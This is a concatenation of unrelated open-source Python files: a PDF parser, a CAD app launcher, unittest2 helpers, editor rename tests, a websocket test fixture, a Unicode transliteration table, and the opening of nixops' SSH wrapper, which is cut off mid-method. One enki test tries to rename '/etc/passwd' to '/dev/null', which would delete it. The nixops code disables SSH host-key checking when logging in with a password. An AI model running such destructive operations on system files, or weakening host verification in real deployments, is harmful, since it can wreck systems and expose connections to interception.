        try:
            # PDF-1.2 or later
            obj = self.lookup_name('Dests', name)
        except KeyError:
            # PDF-1.1 or prior
            if 'Dests' not in self.catalog:
                raise PDFDestinationNotFound(name)
            d0 = dict_value(self.catalog['Dests'])
            if name not in d0:
                raise PDFDestinationNotFound(name)
            obj = d0[name]
        return obj
## PDFParser
##
class PDFParser(PSStackParser):
    """
    PDFParser fetch PDF objects from a file stream.
    It can handle indirect references by referring to
    a PDF document set by set_document method.
    It also reads XRefs at the end of every PDF file.
    Typical usage:
      parser = PDFParser(fp)
      parser.read_xref()
      parser.set_document(doc)
      parser.seek(offset)
      parser.nextobject()
    """
    def __init__(self, fp):
        PSStackParser.__init__(self, fp)
        self.doc = None
        # Set when read_xref() fails: stream lengths are then discovered
        # by scanning instead of trusting /Length.
        self.fallback = False
        return
    def set_document(self, doc):
        """Associates the parser with a PDFDocument object."""
        self.doc = doc
        return
    KEYWORD_R = KWD('R')
    KEYWORD_NULL = KWD('null')
    KEYWORD_ENDOBJ = KWD('endobj')
    KEYWORD_STREAM = KWD('stream')
    KEYWORD_XREF = KWD('xref')
    KEYWORD_STARTXREF = KWD('startxref')
    def do_keyword(self, pos, token):
        """Handles PDF-related keywords."""
        if token in (self.KEYWORD_XREF, self.KEYWORD_STARTXREF):
            self.add_results(*self.pop(1))
        elif token is self.KEYWORD_ENDOBJ:
            # 'objid genno obj <object>' are on the stack; hand them back.
            self.add_results(*self.pop(4))
        elif token is self.KEYWORD_NULL:
            # null object
            self.push((pos, None))
        elif token is self.KEYWORD_R:
            # reference to indirect object
            try:
                ((_,objid), (_,genno)) = self.pop(2)
                (objid, genno) = (int(objid), int(genno))
                obj = PDFObjRef(self.doc, objid, genno)
                self.push((pos, obj))
            except PSSyntaxError:
                pass
        elif token is self.KEYWORD_STREAM:
            # stream object
            ((_,dic),) = self.pop(1)
            dic = dict_value(dic)
            objlen = 0
            if not self.fallback:
                try:
                    objlen = int_value(dic['Length'])
                except KeyError:
                    if STRICT:
                        raise PDFSyntaxError('/Length is undefined: %r' % dic)
            self.seek(pos)
            try:
                (_, line) = self.nextline()  # 'stream'
            except PSEOF:
                if STRICT:
                    raise PDFSyntaxError('Unexpected EOF')
                return
            pos += len(line)
            self.fp.seek(pos)
            data = self.fp.read(objlen)
            self.seek(pos+objlen)
            # /Length may be absent or wrong, so keep scanning forward
            # until the 'endstream' keyword actually appears.
            while 1:
                try:
                    (linepos, line) = self.nextline()
                except PSEOF:
                    if STRICT:
                        raise PDFSyntaxError('Unexpected EOF')
                    break
                if 'endstream' in line:
                    i = line.index('endstream')
                    objlen += i
                    data += line[:i]
                    break
                objlen += len(line)
                data += line
            self.seek(pos+objlen)
            # XXX limit objlen not to exceed object boundary
            if 2 <= self.debug:
                print >>sys.stderr, 'Stream: pos=%d, objlen=%d, dic=%r, data=%r...' % \
                      (pos, objlen, dic, data[:10])
            obj = PDFStream(dic, data, self.doc.decipher)
            self.push((pos, obj))
        else:
            # others
            self.push((pos, token))
        return
    def find_xref(self):
        """Internal function used to locate the first XRef."""
        # search the last xref table by scanning the file backwards.
        prev = None
        for line in self.revreadlines():
            line = line.strip()
            if 2 <= self.debug:
                print >>sys.stderr, 'find_xref: %r' % line
            if line == 'startxref': break
            if line:
                # Reading backwards, `prev` ends up holding the line that
                # follows 'startxref' in the file: the xref byte offset.
                prev = line
        else:
            raise PDFNoValidXRef('Unexpected EOF')
        if 1 <= self.debug:
            print >>sys.stderr, 'xref found: pos=%r' % prev
        return long(prev)
    # read xref table
    def read_xref_from(self, start, xrefs):
        """Reads XRefs from the given location."""
        self.seek(start)
        self.reset()
        try:
            (pos, token) = self.nexttoken()
        except PSEOF:
            raise PDFNoValidXRef('Unexpected EOF')
        if 2 <= self.debug:
            print >>sys.stderr, 'read_xref_from: start=%d, token=%r' % (start, token)
        if isinstance(token, int):
            # XRefStream: PDF-1.5
            self.seek(pos)
            self.reset()
            xref = PDFXRefStream()
            xref.load(self, debug=self.debug)
        else:
            if token is self.KEYWORD_XREF:
                self.nextline()
            xref = PDFXRef()
            xref.load(self, debug=self.debug)
        xrefs.append(xref)
        trailer = xref.get_trailer()
        if 1 <= self.debug:
            print >>sys.stderr, 'trailer: %r' % trailer
        # Hybrid-reference files carry an additional xref *stream*
        # alongside the classic table.
        if 'XRefStm' in trailer:
            pos = int_value(trailer['XRefStm'])
            self.read_xref_from(pos, xrefs)
        if 'Prev' in trailer:
            # find previous xref
            pos = int_value(trailer['Prev'])
            self.read_xref_from(pos, xrefs)
        return
    # read xref tables and trailers
    def read_xref(self):
        """Reads all the XRefs in the PDF file and returns them."""
        xrefs = []
        try:
            pos = self.find_xref()
            self.read_xref_from(pos, xrefs)
        except PDFNoValidXRef:
            # fallback
            if 1 <= self.debug:
                print >>sys.stderr, 'no xref, fallback'
            # No usable xref: rebuild one by scanning the whole file.
            self.fallback = True
            xref = PDFXRef()
            xref.load_fallback(self)
            xrefs.append(xref)
        return xrefs
## PDFStreamParser
##
class PDFStreamParser(PDFParser):
    """
    PDFStreamParser is used to parse PDF content streams
    that is contained in each page and has instructions
    for rendering the page. A reference to a PDF document is
    needed because a PDF content stream can also have
    indirect references to other objects in the same document.
    """
    def __init__(self, data):
        # Parse from an in-memory buffer instead of the file object.
        PDFParser.__init__(self, StringIO(data))
        return
    def flush(self):
        self.add_results(*self.popall())
        return
    def do_keyword(self, pos, token):
        # In content streams only indirect references are resolved;
        # every other keyword (operator/operand) is passed through.
        if token is self.KEYWORD_R:
            # reference to indirect object
            try:
                ((_,objid), (_,genno)) = self.pop(2)
                (objid, genno) = (int(objid), int(genno))
                obj = PDFObjRef(self.doc, objid, genno)
                self.push((pos, obj))
            except PSSyntaxError:
                pass
            return
        # others
        self.push((pos, token))
        return
| bsd-3-clause |
Skylion007/popupcad | popupcad/filetypes/program.py | 1 | 1847 | # -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes.
Email: danaukes<at>seas.harvard.edu.
Please see LICENSE.txt for full license.
"""
import sys
import PySide.QtGui as qg
import popupcad
import logging
import traceback
class Program(object):
    """popupcad application bootstrap: creates the Qt application and the
    main editor window, initializes plugins and installs a global
    exception hook that logs uncaught exceptions to the error log."""
    def __init__(self, plugins, *args, **kwargs):
        args = list(args)
        # NOTE(review): popping from `args` while iterating over it skips
        # the element following each removal; harmless only if
        # '--deprecated' appears at most once -- confirm.
        for item in args:
            if '--deprecated' in item:
                # Graft the deprecated package into the popupcad
                # namespace only when explicitly requested.
                import popupcad_deprecated
                popupcad.deprecated = popupcad_deprecated
                sys.modules['popupcad.deprecated'] = popupcad_deprecated
                args.pop(args.index(item))
        # args[0] is presumably the argv list forwarded by the launcher
        # (QApplication expects an argument list) -- TODO confirm callers.
        self.app = qg.QApplication(args[0])
        self.app.setWindowIcon(popupcad.supportfiles.Icon('popupcad'))
        self.editor = popupcad.guis.editor.Editor()
        # Treat a trailing non-flag argument as a file to open.
        if len(args) > 1 and not '--' in args[-1]:
            self.editor.open(filename=args[-1])
        self.editor.show()
        for plugin in plugins:
            plugin.initialize(self)
        self.create_exception_listener()
    def create_exception_listener(self):
        """Route uncaught exceptions through self.excepthook, keeping a
        reference to the previously installed hook so it can be chained."""
        logging.basicConfig(filename=popupcad.error_log_filename,filemode='w',level=logging.DEBUG)
        import sys
        self.excepthook_internal = sys.excepthook
        sys.excepthook = self.excepthook
    def excepthook(self,exctype,value,tb):
        """Log the exception, mirror it into the editor's error log, then
        chain to the previous hook and alert the user with a dialog."""
        if exctype is not SystemExit:
            message = '''{}: {}'''.format(str(exctype),str(value))
            print(message)
            tbmessage = traceback.format_tb(tb)
            tbmessage = ' '.join(tbmessage)
            logging.error(message)
            logging.debug('\n'+tbmessage)
            self.editor.error_log.appendText(message+'\n'+tbmessage)
            # Delegate to the original hook before showing the message box.
            self.excepthook_internal(exctype,value,tb)
            mb = qg.QMessageBox()
            mb.setText(message)
            mb.exec_()
| mit |
leafji/MYSQL_5.7 | storage/ndb/mcc/tst/unittest2/__init__.py | 155 | 2406 | """
unittest2
unittest2 is a backport of the new features added to the unittest testing
framework in Python 2.7. It is tested to run on Python 2.4 - 2.6.
To use unittest2 instead of unittest simply replace ``import unittest`` with
``import unittest2``.
Copyright (c) 1999-2003 Steve Purcell
Copyright (c) 2003-2010 Python Software Foundation
This module is free software, and you may redistribute it and/or modify
it under the same terms as Python itself, so long as this copyright message
and disclaimer are retained in their original form.
IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF
THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS,
AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE,
SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
"""
__all__ = ['TestResult', 'TestCase', 'TestSuite',
'TextTestRunner', 'TestLoader', 'FunctionTestCase', 'main',
'defaultTestLoader', 'SkipTest', 'skip', 'skipIf', 'skipUnless',
'expectedFailure', 'TextTestResult', '__version__', 'collector']
__version__ = '0.5.1'
# Expose obsolete functions for backwards compatibility
__all__.extend(['getTestCaseNames', 'makeSuite', 'findTestCases'])
from unittest2.collector import collector
from unittest2.result import TestResult
from unittest2.case import (
TestCase, FunctionTestCase, SkipTest, skip, skipIf,
skipUnless, expectedFailure
)
from unittest2.suite import BaseTestSuite, TestSuite
from unittest2.loader import (
TestLoader, defaultTestLoader, makeSuite, getTestCaseNames,
findTestCases
)
from unittest2.main import TestProgram, main, main_
from unittest2.runner import TextTestRunner, TextTestResult
try:
from unittest2.signals import (
installHandler, registerResult, removeResult, removeHandler
)
except ImportError:
# Compatibility with platforms that don't have the signal module
pass
else:
__all__.extend(['installHandler', 'registerResult', 'removeResult',
'removeHandler'])
# deprecated
_TextTestResult = TextTestResult
__unittest = True | gpl-2.0 |
vi/enki | tests/test_core/test_opened_files_dock.py | 1 | 4222 | #!/usr/bin/env python
import unittest
import os.path
import sys
import tempfile
sys.path.insert(0, os.path.join(os.path.abspath(os.path.dirname(__file__)), ".."))
import base
from PyQt4.QtCore import Qt, QPoint
from PyQt4.QtTest import QTest
from enki.core.core import core
from enki.widgets.dockwidget import DockWidget
def _startEditCurrentFilePath():
    """Put the opened-files tree into inline edit mode on the row that
    belongs to the currently active document."""
    explorer = core.workspace().openedFileExplorer
    document = core.workspace().currentDocument()
    explorer.tvFiles.edit(explorer.model.documentIndex(document))
class Rename(base.TestCase):
    """Tests for renaming the current file by editing its path inline in
    the opened-files dock."""
    def test_flags(self):
        # Only a saved, unmodified real document may be renamed in place.
        workspace = core.workspace()
        tree = core.workspace().openedFileExplorer.tvFiles
        model = core.workspace().openedFileExplorer.model
        core.workspace().createEmptyNotSavedDocument()
        def editable():
            # True when the tree row of the current document is editable.
            index = model.documentIndex(workspace.currentDocument())
            return bool(int(model.flags(index)) & Qt.ItemIsEditable)
        self.assertFalse(editable()) # empty not saved document
        workspace.openFile(self.EXISTING_FILE)
        self.assertTrue(editable()) # normal document
        self.keyClicks('adsf', widget=workspace.currentDocument().qutepart)
        self.assertFalse(editable()) # modified document
    @base.inMainLoop
    def test_success(self):
        # Renaming to a fresh path moves the file and keeps its contents.
        core.workspace().openFile(self.EXISTING_FILE)
        NEW_PATH = self.TEST_FILE_DIR + '/newname'
        _startEditCurrentFilePath()
        self.keyClicks(NEW_PATH)
        self.keyClick(Qt.Key_Return)
        QTest.qWait(100) # Test fails without a sleep. Threads inside Qt???
        self.assertTrue(os.path.isfile(NEW_PATH))
        with open(NEW_PATH) as f:
            text = f.read()
        self.assertEqual(text, self.EXISTING_FILE_TEXT)
    @base.inMainLoop
    def test_os_fail(self):
        # An OS-level rename failure must surface an error dialog.
        core.workspace().openFile(self.EXISTING_FILE)
        # The path shall be invalid on both Unix and Windows
        NEW_PATH = '/root/newname:::'
        _startEditCurrentFilePath()
        self.keyClicks(NEW_PATH)
        def runInDialog(dialog):
            self.assertEqual(dialog.windowTitle(), 'Failed to rename file')
            self.keyClick(Qt.Key_Return)
        self.openDialog(lambda: self.keyClick(Qt.Key_Return),
                        runInDialog)
    @base.inMainLoop
    def test_same_path(self):
        # Renaming to the identical path is a silent no-op.
        core.workspace().openFile(self.EXISTING_FILE)
        _startEditCurrentFilePath()
        self.keyClicks(self.EXISTING_FILE)
        self.keyClick(Qt.Key_Return)
        self.assertEqual(self.app.activeWindow(), core.mainWindow()) # not messagebox with error
    @base.inMainLoop
    def test_dev_null(self):
        # Renaming to /dev/null deletes the file and closes the document.
        core.workspace().openFile(self.EXISTING_FILE)
        NEW_PATH = '/dev/null'
        _startEditCurrentFilePath()
        self.keyClicks(NEW_PATH)
        self.keyClick(Qt.Key_Return)
        QTest.qWait(100) # Test fails without a sleep. Threads inside Qt???
        self.assertFalse(os.path.isfile(self.EXISTING_FILE))
        self.assertIsNone(core.workspace().currentDocument())
    # This test reports a permission denied dailog box failure in Windows, but then crashes. Not sure how to work around this.
    @unittest.skipUnless(sys.platform.startswith("linux"), "requires Linux")
    @base.inMainLoop
    def test_dev_null_os_fail(self):
        # Renaming an undeletable file to /dev/null must show an error dialog.
        # On Windows, a file in use cannot be deleted. Create one.
        with tempfile.NamedTemporaryFile() as tempFile:
            # In Linux, pick and undeleteable file (don't run this as root!)
            if sys.platform.startswith("linux"):
                existingNotDeletableFile = '/etc/passwd'
            else:
                existingNotDeletableFile = tempFile.name
            core.workspace().openFile(existingNotDeletableFile)
            NEW_PATH = '/dev/null'
            _startEditCurrentFilePath()
            self.keyClicks(NEW_PATH)
            def runInDialog(dialog):
                # NOTE(review): assertTrue(x, msg) treats the second
                # argument as a failure *message*, so this only checks the
                # title is non-empty; assertEqual (cf. test_os_fail) was
                # probably intended -- confirm the expected title first.
                self.assertTrue(dialog.windowTitle(), 'Not this time')
                self.keyClick(Qt.Key_Return)
            self.openDialog(lambda: self.keyClick(Qt.Key_Return),
                            runInDialog)
# Allow running this module directly as a test script.
if __name__ == '__main__':
    unittest.main()
| gpl-2.0 |
Jayflux/servo | tests/wpt/web-platform-tests/tools/pywebsocket/test/testdata/handlers/sub/wrong_transfer_sig_wsh.py | 499 | 1854 | # Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Wrong web_socket_transfer_data() signature.
"""
def web_socket_do_extra_handshake(request):
    # Accept the handshake unconditionally; this fixture only exercises
    # the dispatcher's handling of a wrong transfer-data signature.
    pass
def no_web_socket_transfer_data(request):
    # Deliberately misnamed (should be web_socket_transfer_data) so the
    # dispatcher treats this file as lacking a transfer-data handler.
    request.connection.write(
        'sub/wrong_transfer_sig_wsh.py is called for %s, %s' %
        (request.ws_resource, request.ws_protocol))
# vi:sts=4 sw=4 et
| mpl-2.0 |
melvon22/osmc | package/mediacenter-skin-osmc/files/usr/share/kodi/addons/script.module.unidecode/lib/unidecode/x020.py | 99 | 4059 | data = (
# Transliteration table for Unicode code points U+2000-U+20FE (General
# Punctuation, Superscripts and Subscripts, Currency Symbols, Combining
# Diacritical Marks for Symbols), indexed by the low byte of the code
# point. '[?]' marks characters with no ASCII approximation.
# NOTE(review): the tuple holds 255 entries (0x00-0xfe); entry 0xff is
# absent -- confirm the consuming lookup bounds-checks the index.
' ', # 0x00
' ', # 0x01
' ', # 0x02
' ', # 0x03
' ', # 0x04
' ', # 0x05
' ', # 0x06
' ', # 0x07
' ', # 0x08
' ', # 0x09
' ', # 0x0a
' ', # 0x0b
'', # 0x0c
'', # 0x0d
'', # 0x0e
'', # 0x0f
'-', # 0x10
'-', # 0x11
'-', # 0x12
'-', # 0x13
'--', # 0x14
'--', # 0x15
'||', # 0x16
'_', # 0x17
'\'', # 0x18
'\'', # 0x19
',', # 0x1a
'\'', # 0x1b
'"', # 0x1c
'"', # 0x1d
',,', # 0x1e
'"', # 0x1f
'+', # 0x20
'++', # 0x21
'*', # 0x22
'*>', # 0x23
'.', # 0x24
'..', # 0x25
'...', # 0x26
'.', # 0x27
'\x0a', # 0x28
'\x0a\x0a', # 0x29
'', # 0x2a
'', # 0x2b
'', # 0x2c
'', # 0x2d
'', # 0x2e
' ', # 0x2f
'%0', # 0x30
'%00', # 0x31
'\'', # 0x32
'\'\'', # 0x33
'\'\'\'', # 0x34
'`', # 0x35
'``', # 0x36
'```', # 0x37
'^', # 0x38
'<', # 0x39
'>', # 0x3a
'*', # 0x3b
'!!', # 0x3c
'!?', # 0x3d
'-', # 0x3e
'_', # 0x3f
'-', # 0x40
'^', # 0x41
'***', # 0x42
'--', # 0x43
'/', # 0x44
'-[', # 0x45
']-', # 0x46
'??', # 0x47
'?!', # 0x48
'!?', # 0x49
'7', # 0x4a
'PP', # 0x4b
'(]', # 0x4c
'[)', # 0x4d
'*', # 0x4e
'[?]', # 0x4f
'[?]', # 0x50
'[?]', # 0x51
'%', # 0x52
'~', # 0x53
'[?]', # 0x54
'[?]', # 0x55
'[?]', # 0x56
"''''", # 0x57
'[?]', # 0x58
'[?]', # 0x59
'[?]', # 0x5a
'[?]', # 0x5b
'[?]', # 0x5c
'[?]', # 0x5d
'[?]', # 0x5e
'[?]', # 0x5f
'', # 0x60
'[?]', # 0x61
'[?]', # 0x62
'[?]', # 0x63
'[?]', # 0x64
'[?]', # 0x65
'[?]', # 0x66
'[?]', # 0x67
'[?]', # 0x68
'[?]', # 0x69
'', # 0x6a
'', # 0x6b
'', # 0x6c
'', # 0x6d
'', # 0x6e
'', # 0x6f
'0', # 0x70
'', # 0x71
'', # 0x72
'', # 0x73
'4', # 0x74
'5', # 0x75
'6', # 0x76
'7', # 0x77
'8', # 0x78
'9', # 0x79
'+', # 0x7a
'-', # 0x7b
'=', # 0x7c
'(', # 0x7d
')', # 0x7e
'n', # 0x7f
'0', # 0x80
'1', # 0x81
'2', # 0x82
'3', # 0x83
'4', # 0x84
'5', # 0x85
'6', # 0x86
'7', # 0x87
'8', # 0x88
'9', # 0x89
'+', # 0x8a
'-', # 0x8b
'=', # 0x8c
'(', # 0x8d
')', # 0x8e
'[?]', # 0x8f
'[?]', # 0x90
'[?]', # 0x91
'[?]', # 0x92
'[?]', # 0x93
'[?]', # 0x94
'[?]', # 0x95
'[?]', # 0x96
'[?]', # 0x97
'[?]', # 0x98
'[?]', # 0x99
'[?]', # 0x9a
'[?]', # 0x9b
'[?]', # 0x9c
'[?]', # 0x9d
'[?]', # 0x9e
'[?]', # 0x9f
'ECU', # 0xa0
'CL', # 0xa1
'Cr', # 0xa2
'FF', # 0xa3
'L', # 0xa4
'mil', # 0xa5
'N', # 0xa6
'Pts', # 0xa7
'Rs', # 0xa8
'W', # 0xa9
'NS', # 0xaa
'D', # 0xab
'EUR', # 0xac
'K', # 0xad
'T', # 0xae
'Dr', # 0xaf
'[?]', # 0xb0
'[?]', # 0xb1
'[?]', # 0xb2
'[?]', # 0xb3
'[?]', # 0xb4
'[?]', # 0xb5
'[?]', # 0xb6
'[?]', # 0xb7
'[?]', # 0xb8
'[?]', # 0xb9
'[?]', # 0xba
'[?]', # 0xbb
'[?]', # 0xbc
'[?]', # 0xbd
'[?]', # 0xbe
'[?]', # 0xbf
'[?]', # 0xc0
'[?]', # 0xc1
'[?]', # 0xc2
'[?]', # 0xc3
'[?]', # 0xc4
'[?]', # 0xc5
'[?]', # 0xc6
'[?]', # 0xc7
'[?]', # 0xc8
'[?]', # 0xc9
'[?]', # 0xca
'[?]', # 0xcb
'[?]', # 0xcc
'[?]', # 0xcd
'[?]', # 0xce
'[?]', # 0xcf
'', # 0xd0
'', # 0xd1
'', # 0xd2
'', # 0xd3
'', # 0xd4
'', # 0xd5
'', # 0xd6
'', # 0xd7
'', # 0xd8
'', # 0xd9
'', # 0xda
'', # 0xdb
'', # 0xdc
'', # 0xdd
'', # 0xde
'', # 0xdf
'', # 0xe0
'', # 0xe1
'', # 0xe2
'', # 0xe3
'[?]', # 0xe4
'', # 0xe5
'[?]', # 0xe6
'[?]', # 0xe7
'[?]', # 0xe8
'[?]', # 0xe9
'[?]', # 0xea
'[?]', # 0xeb
'[?]', # 0xec
'[?]', # 0xed
'[?]', # 0xee
'[?]', # 0xef
'[?]', # 0xf0
'[?]', # 0xf1
'[?]', # 0xf2
'[?]', # 0xf3
'[?]', # 0xf4
'[?]', # 0xf5
'[?]', # 0xf6
'[?]', # 0xf7
'[?]', # 0xf8
'[?]', # 0xf9
'[?]', # 0xfa
'[?]', # 0xfb
'[?]', # 0xfc
'[?]', # 0xfd
'[?]', # 0xfe
)
| gpl-2.0 |
XeLabs/tokudb | storage/ndb/mcc/tst/unittest2/util.py | 751 | 2821 | """Various utility functions."""
__unittest = True

_MAX_LENGTH = 80

def safe_repr(obj, short=False):
    """Return repr(obj), tolerating a broken __repr__.

    If repr() raises, fall back to the default object repr. When *short*
    is true, results of _MAX_LENGTH characters or more are truncated and
    marked as such.
    """
    try:
        text = repr(obj)
    except Exception:
        text = object.__repr__(obj)
    if short and len(text) >= _MAX_LENGTH:
        return text[:_MAX_LENGTH] + ' [truncated]...'
    return text
def safe_str(obj):
    """Return str(obj); if obj's __str__ raises, fall back to the
    default object rendering instead of propagating the error."""
    try:
        text = str(obj)
    except Exception:
        text = object.__str__(obj)
    return text
def strclass(cls):
    """Return the fully qualified 'module.ClassName' string for *cls*."""
    return '{0}.{1}'.format(cls.__module__, cls.__name__)
def sorted_list_difference(expected, actual):
    """Finds elements in only one or the other of two, sorted input lists.

    Returns a two-element tuple of lists. The first list contains those
    elements in the "expected" list but not in the "actual" list, and the
    second contains those elements in the "actual" list but not in the
    "expected" list. Duplicate elements in either input list are ignored.
    """
    missing = []
    unexpected = []
    i = j = 0
    len_expected = len(expected)
    len_actual = len(actual)
    # Two-pointer merge walk. Duplicate runs are skipped so each distinct
    # value is reported at most once; whatever remains in either tail is
    # appended verbatim (matching the historical behaviour).
    while i < len_expected and j < len_actual:
        e = expected[i]
        a = actual[j]
        if e < a:
            missing.append(e)
            i += 1
            while i < len_expected and expected[i] == e:
                i += 1
        elif a < e:
            unexpected.append(a)
            j += 1
            while j < len_actual and actual[j] == a:
                j += 1
        else:
            i += 1
            while i < len_expected and expected[i] == e:
                i += 1
            j += 1
            while j < len_actual and actual[j] == a:
                j += 1
    missing.extend(expected[i:])
    unexpected.extend(actual[j:])
    return missing, unexpected
def unorderable_list_difference(expected, actual, ignore_duplicate=False):
    """Same behavior as sorted_list_difference but
    for lists of unorderable items (like dicts).

    As it does a linear search per item (remove) it
    has O(n*n) performance.

    NOTE: both input lists are consumed/mutated by this function.
    """
    missing = []
    while expected:
        item = expected.pop()
        if item in actual:
            actual.remove(item)
        else:
            missing.append(item)
            if ignore_duplicate:
                # Purge every other occurrence of the missing item.
                for lst in (expected, actual):
                    while item in lst:
                        lst.remove(item)
    if not ignore_duplicate:
        # anything left in actual is unexpected
        return missing, actual
    unexpected = []
    while actual:
        item = actual.pop()
        unexpected.append(item)
        while item in actual:
            actual.remove(item)
    return missing, unexpected
| gpl-2.0 |
Phreedom/nixops | nixops/ssh_util.py | 2 | 8022 | # -*- coding: utf-8 -*-
import os
import shlex
import subprocess
import weakref
import sys
from tempfile import mkdtemp
import nixops.util
__all__ = ['SSHConnectionFailed', 'SSHCommandFailed', 'SSH']
class SSHConnectionFailed(Exception):
    """Raised when an SSH (master) connection to the target host cannot
    be established."""
    pass
class SSHCommandFailed(nixops.util.CommandFailed):
    """Raised when a command executed over SSH exits with a non-zero
    status."""
    pass
class SSHMaster(object):
    """Wraps a long-lived OpenSSH master connection (ControlMaster) so
    subsequent SSH sessions to the same target are multiplexed over a
    single TCP connection via a control socket."""
    def __init__(self, target, logger, ssh_flags, passwd):
        self._tempdir = mkdtemp(prefix="nixops-tmp")
        self._askpass_helper = None
        self._control_socket = self._tempdir + "/ssh-master-socket"
        self._ssh_target = target
        pass_prompts = 0
        kwargs = {}
        additional_opts = []
        if passwd is not None:
            # Feed the password through an SSH_ASKPASS helper: ssh only
            # consults SSH_ASKPASS when it has no controlling terminal,
            # hence the fake DISPLAY and the setsid() in the child.
            self._askpass_helper = self._make_askpass_helper()
            newenv = dict(os.environ)
            newenv.update({
                'DISPLAY': ':666',
                'SSH_ASKPASS': self._askpass_helper,
                'NIXOPS_SSH_PASSWORD': passwd,
            })
            kwargs['env'] = newenv
            kwargs['stdin'] = nixops.util.devnull
            kwargs['preexec_fn'] = os.setsid
            pass_prompts = 1
            additional_opts = ['-oUserKnownHostsFile=/dev/null',
                               '-oStrictHostKeyChecking=no']
        # -M: master mode, -N: no remote command, -f: background after auth.
        cmd = ["ssh", "-x", self._ssh_target, "-S",
               self._control_socket, "-M", "-N", "-f",
               '-oNumberOfPasswordPrompts={0}'.format(pass_prompts),
               '-oServerAliveInterval=60'] + additional_opts
        res = subprocess.call(cmd + ssh_flags, **kwargs)
        if res != 0:
            raise SSHConnectionFailed(
                "unable to start SSH master connection to "
                "‘{0}’".format(target)
            )
        # Flags that client sessions must pass to reuse this master.
        self.opts = ["-oControlPath={0}".format(self._control_socket)]
    def _make_askpass_helper(self):
        """
        Create a SSH_ASKPASS helper script, which just outputs the contents of
        the environment variable NIXOPS_SSH_PASSWORD.
        """
        path = os.path.join(self._tempdir, 'nixops-askpass-helper')
        # 0700: owner-only, O_NOFOLLOW guards against symlink tricks
        # (0700 is the Python 2 octal literal, i.e. 0o700).
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW, 0700)
        os.write(fd, """#!{0}
import sys
import os
sys.stdout.write(os.environ['NIXOPS_SSH_PASSWORD'])""".format(sys.executable))
        os.close(fd)
        return path
    def shutdown(self):
        """
        Shutdown master process and clean up temporary files.
        """
        # Ask the running master to exit via its control socket.
        subprocess.call(["ssh", self._ssh_target, "-S",
                         self._control_socket, "-O", "exit"],
                        stderr=nixops.util.devnull)
        for to_unlink in (self._askpass_helper, self._control_socket):
            if to_unlink is None:
                continue
            try:
                os.unlink(to_unlink)
            except OSError:
                pass
        try:
            os.rmdir(self._tempdir)
        except OSError:
            pass
    def __del__(self):
        self.shutdown()
class SSH(object):
    """
    Convenience wrapper around an SSH connection to a single target host.

    The target host, extra flags and password are supplied lazily through
    registered callback functions, so the connection details may change
    between calls.  A shared SSHMaster connection is created on demand and
    reused for subsequent commands.
    """

    def __init__(self, logger):
        """
        Initialize a SSH object with the specified Logger instance, which will
        be used to write SSH output to.
        """
        self._flag_fun = lambda: []
        self._host_fun = None
        self._passwd_fun = lambda: None
        self._logger = logger
        self._ssh_master = None

    def register_host_fun(self, host_fun):
        """
        Register a function which returns the hostname or IP to connect to. The
        function has to require no arguments.
        """
        self._host_fun = host_fun

    def _get_target(self):
        # Always connects as root; the host itself comes from the callback.
        if self._host_fun is None:
            raise AssertionError("don't know which SSH host to connect to")
        return "root@{0}".format(self._host_fun())

    def register_flag_fun(self, flag_fun):
        """
        Register a function that is used for obtaining additional SSH flags.
        The function has to require no arguments and should return a list of
        strings, each being a SSH flag/argument.
        """
        self._flag_fun = flag_fun

    def _get_flags(self):
        return self._flag_fun()

    def register_passwd_fun(self, passwd_fun):
        """
        Register a function that returns either a string or None and requires
        no arguments. If the return value is a string, the returned string is
        used for keyboard-interactive authentication, if it is None, no attempt
        is made to inject a password.
        """
        self._passwd_fun = passwd_fun

    def _get_passwd(self):
        return self._passwd_fun()

    def reset(self):
        """
        Reset SSH master connection.
        """
        if self._ssh_master is not None:
            self._ssh_master.shutdown()
            self._ssh_master = None

    def get_master(self, flags=[], tries=5):
        """
        Start (if necessary) an SSH master connection to speed up subsequent
        SSH sessions. Returns the SSHMaster instance on success.
        """
        # Note: the mutable default is safe here because `flags` is only ever
        # rebound (below), never mutated in place.
        flags = flags + self._get_flags()
        if self._ssh_master is not None:
            # Hand out a weak proxy so callers cannot keep the master alive
            # past a reset().
            return weakref.proxy(self._ssh_master)
        # Retry master creation up to `tries` times; the final failure is
        # re-raised to the caller.
        while True:
            try:
